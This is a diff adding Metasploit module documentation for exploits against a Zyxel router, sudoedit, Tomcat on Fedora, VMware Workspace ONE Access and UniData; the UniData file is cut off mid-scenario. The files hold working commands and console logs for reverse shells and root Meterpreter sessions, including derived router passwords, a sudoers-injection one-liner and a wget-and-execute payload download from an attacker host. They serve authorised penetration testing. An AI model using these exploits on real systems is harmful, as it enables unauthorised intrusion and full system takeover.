+This module has been tested against a vulnerable Zyxel router with the specifications listed below:
+
+* Zyxel router VMG3625-T20A
+* Firmware: V5.30(ABQC.3)C0
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. `use exploit/linux/http/zyxel_lfi_unauth_ssh_rce`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0=unix command, 1=Linux dropper, 2=Interactive SSH>`
+1. `exploit`
+1. You should be able to get a session based on the target setting.
+
+
+## Options
+Option `STORE_CRED` can be set to store the derived credentials (supervisor) in the database of Metasploit.
+Default setting is `true`.
+
+### Advanced options
+Option `SSH_DEBUG` can be set to enable SSH debugging output (Extreme verbosity!). Default is `false`.
+Option `SSH_TIMEOUT` can be used to specify the maximum time to negotiate a SSH session. Default is 30 seconds.
+Option `ConnectTimeout` where you can specify the maximum number of seconds to establish a TCP connection. Default is 10 seconds.
+
+## Scenarios
+
+### Zyxel router VMG3625-T20A - Netcat reverse shell
+```
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > options
+
+Module options (exploit/linux/http/zyxel_lfi_unauth_ssh_rce):
+
+   Name        Current Setting         Required  Description
+   ----        ---------------         --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.1.1             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasp
+                                                 loit/basics/using-metasploit.html
+   RPORT       8080                    yes       The target port (TCP)
+   SSL         false                   no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
+   STORE_CRED  false                   no        Store credentials into the database.
+   URIPATH                             no        The URI to use for this exploit (default is random)
+   VHOST                               no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on th
+                                       e local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 0
+target => 0
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
+[+] The target is vulnerable.
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
+[*] SSH service is available and SSH Port 22 is open. Continue to login.
+[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
+[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
+[*] Authentication with derived supervisor password using Method3 is successful.
+[*] Executing Unix Command for cmd/unix/reverse_netcat
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:51236) at 2023-04-18 19:57:49 +0000
+
+uname -a
+Linux VMG3625-T20A 2.6.36 #7 SMP Mon Aug 27 19:59:01 CET 2018 mips GNU/Linux
+id
+uid=12(supervisor) gid=12 groups=12
+exit
+
+[*] 192.168.1.1 - Command shell session 1 closed.
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce)
+```
+
+### Zyxel router VMG3625-T20A - Linux Dropper Meterpreter session
+```
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
+[+] The target is vulnerable.
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
+[*] SSH service is available and SSH Port 22 is open. Continue to login.
+[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
+[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
+[*] Authentication with derived supervisor password using Method3 is successful.
+[*] Executing Linux Dropper for linux/mipsbe/meterpreter/reverse_tcp
+[*] Command Stager progress -  42.72% done (499/1168 bytes)
+[*] Command Stager progress -  85.36% done (997/1168 bytes)
+[*] Sending stage (1299256 bytes) to 127.0.0.1
+[*] Command Stager progress - 100.00% done (1168/1168 bytes)
+[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.1:40364) at 2023-04-18 20:00:59 +0000
+
+meterpreter > getuid
+Server username: supervisor
+meterpreter > sysinfo
+Computer     : 192.168.1.1
+OS           :  (Linux 2.6.36)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.1 - Meterpreter session 2 closed.  Reason: User
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce)
+```
+
+### Zyxel router VMG3625-T20A - Interactive SSH session and storing the credentials of user supervisor
+```
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 2
+target => 2
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set STORE_CRED true
+STORE_CRED => true
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
+[+] The target is vulnerable.
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
+[*] SSH service is available and SSH Port 22 is open. Continue to login.
+[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
+[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
+[*] Authentication with derived supervisor password using Method3 is successful.
+[*] Credentials for user:supervisor are added to the database...
+[*] SSH session 3 opened (192.168.1.2:34493 -> 192.168.1.1:22) at 2023-04-18 20:07:36 +0000
+
+uname -a
+Linux VMG3625-T20A 2.6.36 #7 SMP Mon Aug 27 20:08:48 CET 2018 mips GNU/Linux
+id
+uid=12(supervisor) gid=12 groups=12
+exit
+
+[*] 192.168.1.1 - SSH session 3 closed.  Reason: User exit
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > creds -u supervisor
+Credentials
+===========
+
+host           origin         service          public      private   realm  private_type  JtR Format
+----           ------         -------          ------      -------   -----  ------------  ----------
+192.168.1.1    192.168.1.1    8080/tcp (http)  supervisor  58Pxnwdefr       Password
+
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > 
+```
+
+## Limitations
+No limitations identified.
@@ -0,0 +1,162 @@
+## Vulnerable Application
+
+This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.
+The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided
+environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to
+append arbitrary entries to the list of files to process. This can lead to privilege escalation.
+by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
+privileges.
+
+Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu
+22.04 and 22.10.
+
+This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and
+1.9.11p3-1ubuntu1 on Ubuntu 22.10.
+
+### Exploit Breakdown
+
+This exploit works by first identifying what file can be edited via `sudo -l`.  The `-S` flag
+is also required or sudo may complain about not being in a proper tty environment, so `-S` specifies
+to allow password input via stdin (although we never provide a password).
+
+Next we make a new entry in `/etc/sudoers`.  In theory we could specify something similar to `"$USER ALL=(ALL:ALL) ALL"`
+which many of the PoCs do, however we can be more surgical.  In this case, we don't specify the payload as most
+Metasploit exploits would, but actually a shell (`/bin/sh` by default), as `sudo` doesn't play well with `&`.
+We also add a flag at the end of our entry after a `#` (comment) for ease of erasing later.
+
+Next we execute out payload, launching it through our shell.
+
+Many of the PoCs work via user input where you have to manually edit `/etc/sudoers`. Obviously this strategy
+won't work with Metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
+the write and quite command, similar to:
+```EDITOR="vi -c ':$' -c ':s/$/\\r`whoami` ALL=(ALL:ALL) ALL/' -c ':wq'  -c ':q' -- /etc/sudoers" sudo -e /etc/motd```
+However, the command didn't do well with newlines and escaping.
+
+`sed` however is a valid editor, so it was relatively trivial to script out adding the new entry via sed:
+```EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: ALL' -- /etc/sudoers" sudo -e /etc/motd```
+
+#### Results from other OSes
+
+Most of the errors are similar to:
+
+```
+[*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # 2Iq0tUAqsqtn' -- /etc/sudoers" sudo -S -e /etc/motd
+[*] sudo: --: editing files in a writable directory is not permitted
+[*] sed: -e expression #1, char 1: unknown command: `''
+```
+
+### Install
+
+#### On Ubuntu 22.10:
+
+```
+https://mirrors.wikimedia.org/ubuntu/ubuntu/pool/main/s/sudo/sudo_1.9.11p3-1ubuntu1_amd64.deb
+sudo dpkg -i sudo_1.9.11p3-1ubuntu1_amd64.deb
+```
+
+Follow the 22.04 instructions, after installing the deb package, to configure the host.
+
+#### On Ubuntu 22.04:
+
+```
+wget http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.9.9-1ubuntu2_amd64.deb
+sudo dpkg -i sudo_1.9.9-1ubuntu2_amd64.deb
+```
+
+Now add an entry to `/etc/sudoers` for an editable file, in this case we use `/etc/motd`.
+Change 'user' for whatever user you want to be able to exploit this:
+
+```
+user ALL=(root) NOPASSWD: sudoedit /etc/motd
+```
+
+Now test this by running `sudo -l` and you should see:
+
+```
+User <user> may run the following commands on <system>:
+    (ALL : ALL) ALL
+    (root) NOPASSWD: sudoedit /etc/motd
+```
+
+Noting the entry at the bottom to `/etc/motd`
+
+## Verification Steps
+
+1. Install the application
+2. Get an initial shell
+3. Do: `use exploit/linux/local/sudoedit_bypass_priv_esc`
+4. Do: `set session [session]`
+5. Do: `run`
+6. You should get a root shell.
+
+## Options
+
+### EDITABLEFILE
+
+The file which can be edited via `sudoedit`. An attempt to auto detect this is made, so it is only required
+if auto detection fails.
+
+### SHELL
+
+Which shell to use. Defaults to `/bin/sh`
+
+### TIMEOUT
+
+The amount of time to wait for a `sudo` command to respond. Defaults to `5`.
+
+
+## Scenarios
+
+### Sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
+
+```
+[*] Processing sudoedit.rb for ERB directives.
+resource (sudoedit.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (sudoedit.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (sudoedit.rb)> set username ubuntu
+username => ubuntu
+resource (sudoedit.rb)> set password ubuntu
+password => ubuntu
+resource (sudoedit.rb)> run
+[*] 1.1.1.1:22 - Starting bruteforce
+[+] 1.1.1.1:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd) Linux ubuntu2204 5.15.0-48-generic #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (2.2.2.2:46613 -> 1.1.1.1:22) at 2023-04-25 18:46:03 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (sudoedit.rb)> use exploit/linux/local/sudoedit_bypass_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (sudoedit.rb)> set session 1
+session => 1
+resource (sudoedit.rb)> set verbose true
+verbose => true
+resource (sudoedit.rb)> exploit
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] sudo version 1.9.9.pre.1ubuntu2 is vulnerable
+[+] The target is vulnerable. Sudo 1.9.9.pre.1ubuntu2 is vulnerable, can edit: /etc/motd
+[*] Writing '/tmp/.LImVy' (250 bytes) ...
+[*] Max line length is 65537
+[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
+[*] Adding user to sudoers
+[*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # SbccIOwAiK1i' -- /etc/sudoers" sudo -S -e /etc/motd
+[+] Likely successful exploitation, detected possitive error message: editing files in a writable directory is not permitted
+[*] sudo: --: editing files in a writable directory is not permitted
+[*] Spawning payload
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 1.1.1.1
+[-] Manual cleanup is likely required, please run: sed -i '/# SbccIOwAiK1i/d' /etc/sudoers
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:57426) at 2023-04-25 18:46:25 -0400
+
+(Meterpreter 2)(/home/ubuntu) > getuid
+Server username: root
+(Meterpreter 2)(/home/ubuntu) > sysinfo
+Computer     : 1.1.1.1
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 2)(/home/ubuntu) > 
+```
@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in RedHat based systems where
+improper file permissions are applied to `/usr/lib/tmpfiles.d/tomcat.conf`
+for Apache Tomcat versions before 7.0.54-8.  This may also work against
+
+The configuration files in `tmpfiles.d` are used by `systemd-tmpfiles` to manage
+temporary files including their creation.
+
+With this weak permission, we're able to inject commands into `systemd-tmpfiles`
+service to write a cron job to execute our payload.
+
+`systemd-tmpfiles` is executed by default on boot on RedHat-based systems
+through `systemd-tmpfiles-setup.service`. Depending on the system in use,
+the execution of `systemd-tmpfiles` could also be triggered by other
+services, cronjobs, startup scripts etc.
+
+This module was tested against Tomcat 7.0.54-3 on Fedora 21.
+
+### Install
+
+This will install Tomcat 7 (7.0.54-3) on Fedora 21.
+
+We also change the `tomcat` user's shell to `/bin/bash` to make setting up the priv-esc
+easier.
+
+```
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-lib-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-collections-3.2.1-20.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-daemon-1.0.15-8.fc21.x86_64.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-dbcp-1.4-16.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-logging-1.1.3-14.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/a/apache-commons-pool-1.6-9.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-el-2.2-api-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-jsp-2.2-api-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/t/tomcat-servlet-3.0-api-7.0.54-3.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/e/ecj-4.4.0-1.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/g/geronimo-jta-1.1.1-17.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/g/geronimo-jms-1.1.1-19.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/l/log4j12-1.2.17-7.fc21.noarch.rpm
+wget https://archive.fedoraproject.org/pub/archive/fedora/linux/releases/21/Everything/x86_64/os/Packages/j/javamail-1.5.1-3.fc21.noarch.rpm
+rpm -i *.rpm
+sudo sed -i 's|/bin/nologin|/bin/bash|g' /etc/passwd
+```
+
+You can now `su tomcat` and get your starter shell.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get an initial shell as the `tomcat` user
+4. Do: `use exploit/linux/local/tomcat_rhel_based_temp_priv_esc`
+5. Do: `set session #`
+6. Do: `run`
+7. You should get a root shell.
+
+## Options
+
+### WritableDir
+
+A directory where we can write and execute files. Defaults to `/tmp`.
+
+## Scenarios
+
+### Tomcat 7 (7.0.54-3) on Fedora 21
+
+Initial shell
+
+```
+msf6 > use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(multi/script/web_delivery) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(multi/script/web_delivery) > set target 7
+target => 7
+msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/script/web_delivery) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/script/web_delivery) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8080/fGd5wnh85
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO TbT9zhqH --no-check-certificate http://1.1.1.1:8080/fGd5wnh85; chmod +x TbT9zhqH; ./TbT9zhqH& disown
+
+msf6 exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2      web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045348 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41270) at 2023-01-19 15:22:23 -0500
+
+msf6 exploit(multi/script/web_delivery) > jobs -K
+Stopping all jobs...
+
+[*] Server stopped.
+msf6 exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: tomcat
+meterpreter > sysinfo
+Computer     : localhost.domain
+OS           : Fedora 21 (Linux 3.17.4-301.fc21.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Priv Esc
+
+```
+msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/tomcat_rhel_based_temp_priv_esc
+[*] Using configured payload linux/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set verbose true
+verbose => true
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set session 1
+session => 1
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable app version detected: 7.0.54.pre.3
+[*] Creating backup of /usr/lib/tmpfiles.d/tomcat.conf
+[+] Original /usr/lib/tmpfiles.d/tomcat.conf backed up to /root/.msf4/loot/20230119152336_default_2.2.2.2_usrlibtmpfile_530018.txt
+[*] Uploading Payload to /tmp/.4ptbf6f4fW
+[*] Writing '/tmp/.4ptbf6f4fW' (1068640 bytes) ...
+[*] Writing permission elevation into /usr/lib/tmpfiles.d/tomcat.conf
+[*] Creating cron job in /etc/cron.d/grPwZ
+[+] Waiting 1800 seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)
+[*] Sleeping for 2 seconds before attempting again
+[*] Sleeping for 4 seconds before attempting again
+[*] Sleeping for 8 seconds before attempting again
+[-] /etc/cron.d/grPwZ not found, checking in 10 seconds
+[*] Waiting on cron to kick the payload (~1 minute)
+[+] Deleted /tmp/.4ptbf6f4fW
+[+] Deleted /etc/cron.d/grPwZ
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:41271) at 2023-01-19 15:24:24 -0500
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+This module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the certproxyService.sh script
+so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their
+privileges to root access.
+
+| Vulnerable Application  | Vulnerable version   |
+|---|---|
+| VMware Workspace ONE Access (Access)   |  21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0  |
+| VMware Identity Manager (vIDM)  |  3.3.6, 3.3.5, 3.3.4, 3.3.3  |
+| VMware vRealize Automation (vRA)  |  8.x, 7.6  |
+| VMware Cloud Foundation | 4.x | 
+| vRealize Suite Lifecycle Manager| 8.x |
+
+### Setup
+
+In order to download a vulnerable application you do need VMware Customer Connect credentials. Navigate to
+[Download VMware Workspace ONE Access (VIDM)](https://customerconnect.vmware.com/downloads/info/slug/desktop_end_user_computing/vmware_workspace_one_access_vidm/20_10).
+to download the OVA file. 
+During VM Configuration within VMware Fusion, in Addition Settings input the following: 
+
+#### Application:
+
+Timezone: (timezone of your choice)
+
+Join the VMware Custom Experience Improvement Program: (deselect)
+
+#### Networking Properties: (note the following may depend on your network configuration)
+
+Host Name (FQDN): access01.corp.local
+
+Default Gateway: 192.168.123.1 
+
+Domain Name: (blank)
+
+Domain Search Path: (blank)
+
+DNS: 192.168.123.1 
+
+IP Address: 192.168.123.16 
+Network: 255.255.255.0
+
+Add the following line to your `/etc/hosts` file:
+`192.168.123.16 access.test.local`
+
+Be sure to change the network adapter of the VM to the network adapter that corresponds to the subnet of the static IP address you assigned above.
+
+#### GUI Setup
+
+Once running navigate to https://access.test.local:8443/cfg/setup
+in order to complete the following setup requirements:
+
+Set Passwords
+ - Appliance Administrator Account
+ - Appliance Root Account
+ - Remote User Account
+
+Select Database
+ - Database Type: Internal Database
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/local/vmware_workspace_one_access_cve_2022_22960`
+1. Set the `SESSION`, `LHOST`, and `TARGET`
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### VMware Identity Manager 21.08.0.1-19010796
+
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain) > use exploit/linux/local/vmware_workspace_one_access_cve_2022_22960
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > set lport 4443
+lport => 4443
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4443
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. vulnerable
+[*] Writing '/tmp/QbCpIao.sh' (1658 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (24772 bytes) to 192.168.123.16
+[+] Deleted /tmp/QbCpIao.sh
+[*] Meterpreter session 9 opened (192.168.123.1:4443 -> 192.168.123.16:53800) at 2023-04-07 10:38:05 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : access01.corp.local
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.16 - Meterpreter session 9 closed.  Reason: User exit
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > set target 1
+target => 1
+msf6 exploit(linux/local/vmware_workspace_one_access_cve_2022_22960) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4443
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. vulnerable
+[*] Writing '/tmp/oMNw.sh' (250 bytes) ...
+[*] Writing '/tmp/FsMoUmqB.sh' (1132 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (3045348 bytes) to 192.168.123.16
+[+] Deleted /tmp/oMNw.sh
+[+] Deleted /tmp/FsMoUmqB.sh
+[*] Meterpreter session 10 opened (192.168.123.1:4443 -> 192.168.123.16:53838) at 2023-04-07 10:38:34 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : access01.corp.local
+OS           : VMware Photon OS 3.0 (Linux 4.19.217-1.ph3)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,361 @@
+## Vulnerable Application
+
+Exploits a built-in username/password combination in `udadmin_server`, which is
+the administrator server for UniData (and possibly other services). It's
+accessed via the RPC service `unirpcd`.
+
+A special username `:local:` is hardcoded into the application. If a user
+attempts to remotely authenticate as `:local:`, the password is fully
+predictable; it's made up of `<username>:<uid>:<gid>`, where the fields are:
+
+* `username` - a username on the target host (eg, "root")
+* `uid` - the corresponding user id (eg, 0 for "root")
+* `gid` - any non-zero group id
+
+If the user authenticates to the RPC service with this account, the username
+and uid are validated, then the service will drop privileges to the given
+account. Then the user can access any of the `udadmin_server` commands,
+including `OsCommand`, which executes a Linux shell command.
+
+The vulnerable application is `udadmin_server`, which is an RPC service that's
+run as part of `unirpcd`, which powers Rocket Software's UniData application
+(among others). The specific software is UniData 8.2.4.3001 for Linux. We
+haven't tested any other versions (except for Windows, which is not
+vulnerable).
+
+The UniData software can be downloaded for free, but you have to request a demo
+copy and wait for an email to arrive. I can provide the installation files if
+needed.
+
+The software is distributed as a .zip file, which contains a .tar file:
+
+```
+  [ron@unidata unidata]$ unzip Unidata\ Personal\ X86_8.2.4.3001.zip
+  Archive:  Unidata Personal X86_8.2.4.3001.zip
+    inflating: bin.tar
+    inflating: UniData_Hotfix_V824_3001.pdf
+    inflating: UniData_Release_Notes_v824.pdf
+
+  [ron@unidata unidata]$ tar -xf bin.tar
+
+  [ron@unidata unidata]$ sudo ./udtsetup
+
+    [default options, set directories]
+
+    CheckLang            Yes
+    CheckPerms           No
+    Group                sys
+    InstallXDEMO         Yes
+    LibDir               /home/ron/unidata/unidata/lib
+    Startud              Yes
+    UdtBin               /home/ron/unidata/unidata/bin
+    UdtHome              /home/ron/unidata/unidata
+    UnisharedDir         /home/ron/unidata/unishared
+    WorkDir              /home/ron/unidata/unidata/work
+```
+
+I think it will automatically start the first time you install the software,
+but to run it after a reboot (note that this must be done as root):
+
+```
+  # export UDTBIN=/home/ron/unidata/unidata/bin
+  # export UDTHOME=/home/ron/unidata/unidata
+  # export PATH=$PATH:$UDTBIN
+  # export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$UDTBIN
+  # export LANG=C
+  # startud
+```
+
+(This module will not work at all against the Windows version)
+
+## Verification Steps
+
+1. Install the application (software and instructions are on Vulnerable Software drive)
+1. Start msfconsole
+1. Do: `use exploit/linux/misc/unidata_udadmin_auth_bypass`
+1. Do: set `RHOST`, `LHOST`, and payload if desired
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### `UNIRPC_USERNAME`
+
+The local username to use when authenticating. It must correspond to a Linux
+account on the target host (it will be passed to `getpwnam(3)`, which must
+recognize it). Generally, the default (`root`) works perfectly fine.
+
+### `UNIRPC_UID`
+
+The Linux user id that the service will run your command as. It must be the
+user id that corresponds to the `UNIRPC_USERNAME`. The default (`0`) generally
+works perfectly fine if `UNIRPC_USERNAME` is `root`.
+
+### `UNIRPC_GID`
+
+The Linux group id that the service will run your command as. Cannot be `0`,
+but any other value works fine. The default (`1000`) probably looks the least
+weird.
+
+### `UNIRPC_ENDPOINT`
+
+The RPC endpoint to connect to. The default (`udadmin`) as well as `udadmin82`
+should work. It's unlikely anything else will work.
+
+### `UNIRPC_ENCODE_MESSAGES`
+
+A boolean, defined in the `unirpc.rb` mixin, that turns UniRPC's packet-body
+encoding on or off. Default is `true`.
+
+In the UniRPC header, there is a bit that enables packet encoding. If set, the
+packet body is XOR'd with either 1 or 2, depending on another header field.
+While it's not strong encoding by any means, it does hide the exploit from
+passive inspection. We set the encoding the XOR'ing with 2 by default.
+
+## Scenarios
+
+### Version 8.2.4 with root user, unix command target
+
+```
+msf6 > use exploit/linux/misc/unidata_udadmin_auth_bypass
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set LHOST ens160
+LHOST => ens160
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set RHOST 10.0.0.198
+RHOST => 10.0.0.198
+
+msf6 exploit(linux/misc/unidata_udadmin_auth_bypass) > set UNIDATA_VERSION 8.2.4
